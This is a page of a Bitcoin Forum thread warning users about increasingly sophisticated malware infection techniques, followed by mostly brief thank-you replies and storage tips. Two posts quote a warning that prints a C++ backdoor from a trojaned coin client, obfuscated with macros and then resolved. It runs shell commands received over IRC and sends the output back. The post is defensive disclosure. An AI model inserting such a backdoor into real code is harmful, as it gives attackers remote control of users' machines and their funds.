Bitcoin Forum
May 07, 2024, 12:09:59 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 696752 times)
Hoxysado
Full Member
***
Offline Offline

Activity: 392
Merit: 100



View Profile
May 06, 2018, 06:58:59 PM
 #621

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0
Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money
1715083799
Hero Member
*
Offline Offline

Posts: 1715083799

View Profile Personal Message (Offline)

Ignore
1715083799
Reply with quote  #2

1715083799
Report to moderator
1715083799
Hero Member
*
Offline Offline

Posts: 1715083799

View Profile Personal Message (Offline)

Ignore
1715083799
Reply with quote  #2

1715083799
Report to moderator
1715083799
Hero Member
*
Offline Offline

Posts: 1715083799

View Profile Personal Message (Offline)

Ignore
1715083799
Reply with quote  #2

1715083799
Report to moderator
"In a nutshell, the network works like a distributed timestamp server, stamping the first transaction to spend a coin. It takes advantage of the nature of information being easy to spread but hard to stifle." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
Tonymillions
Newbie
*
Offline Offline

Activity: 131
Merit: 0


View Profile
May 07, 2018, 08:28:06 AM
 #622

OMG

i can;t believe this information.
thank you guys.
i will pass the message across.

Thanks
Miminaha
Member
**
Offline Offline

Activity: 368
Merit: 10


View Profile
May 07, 2018, 09:38:33 PM
 #623

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus
Hoxysado
Full Member
***
Offline Offline

Activity: 392
Merit: 100



View Profile
May 09, 2018, 07:58:02 PM
 #624

I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon
bitbloq.io
Copper Member
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
May 09, 2018, 08:00:26 PM
 #625

I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
Israel712
Newbie
*
Offline Offline

Activity: 112
Merit: 0


View Profile
May 10, 2018, 05:39:29 AM
 #626

I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.




dangphananh
Newbie
*
Offline Offline

Activity: 184
Merit: 0


View Profile WWW
May 10, 2018, 03:32:39 PM
 #627

Bad software scare people the most, I use cash for complete security and I recommend doing so
Seram1
Newbie
*
Offline Offline

Activity: 197
Merit: 0


View Profile
May 10, 2018, 07:42:31 PM
 #628

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus
indeed we must always be careful in maintaining our assets. because there are always thieves everywhere. if your assets are gone you can not report where to go because it will be difficult to find him. better prevent before something happens that we do not want.
Seram1
Newbie
*
Offline Offline

Activity: 197
Merit: 0


View Profile
May 10, 2018, 08:42:05 PM
 #629

I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon
I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
loinguyen1984
Newbie
*
Offline Offline

Activity: 17
Merit: 0


View Profile
May 11, 2018, 03:01:12 AM
 #630

I am a new member, please help
kalstarzz
Full Member
***
Offline Offline

Activity: 770
Merit: 100


View Profile
May 11, 2018, 06:07:50 PM
 #631

this virus has spread and will hurt many people.
if the antivirus is no longer functioning, how we can avoid the virus attack. ?
novak hiel
Newbie
*
Offline Offline

Activity: 77
Merit: 0


View Profile
May 13, 2018, 01:21:16 PM
 #632

Is there still malware infection attempst? Thank you!!
Wiliam heil
Newbie
*
Offline Offline

Activity: 70
Merit: 0


View Profile
May 14, 2018, 09:04:31 AM
 #633

I am newbie and thanks for informing. I would like to ask how can we spot a scammer
yetiripper
Full Member
***
Offline Offline

Activity: 250
Merit: 100


The Future Of Work


View Profile
May 14, 2018, 12:12:14 PM
 #634

This year I am working on getting different wallets and a separate apple so that all the extra programms that I use do not counteract with the system operation itself.
edison benzamin
Newbie
*
Offline Offline

Activity: 52
Merit: 0


View Profile
May 15, 2018, 03:47:54 PM
 #635

I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
ProfessorZ
Copper Member
Jr. Member
*
Offline Offline

Activity: 84
Merit: 1


View Profile
May 15, 2018, 11:28:19 PM
 #636

I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and burry it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.
omareckmac
Member
**
Offline Offline

Activity: 434
Merit: 15

www.cd3d.app


View Profile
May 16, 2018, 05:30:35 AM
 #637

Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.

Crypto11021
Newbie
*
Offline Offline

Activity: 107
Merit: 0


View Profile WWW
May 16, 2018, 07:56:27 AM
 #638

If you can post the coins name it will be better
ProfessorZ
Copper Member
Jr. Member
*
Offline Offline

Activity: 84
Merit: 1


View Profile
May 16, 2018, 09:14:47 AM
 #639

If you tought air-gapped devices are safe, read this: https://arstechnica.com/information-technology/2018/04/new-hacks-siphon-private-cryptocurrency-keys-from-airgapped-wallets/

Sounds to me like Person of interest, but still feasible in some ideal conditions.
Negdan4ik
Member
**
Offline Offline

Activity: 230
Merit: 10

The Exchange for EOS Community


View Profile
May 16, 2018, 04:39:48 PM
 #640

I think we should be very careful about the infestations.Thank you very much for the overview and useful information, I Think that this site is very useful for scammers who want easy money. Forewarned is forearmed.

▐|   EOS Exchange   |▌          The Exchange for the EOS Community!          ▐|   EOSex   |▌
                    ICO: 15th October to 20th November  |  Free EXP Tokens: Join Bounty!                    
Whitepaper               ANN Thread               Telegram               Twitter               Mobile
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!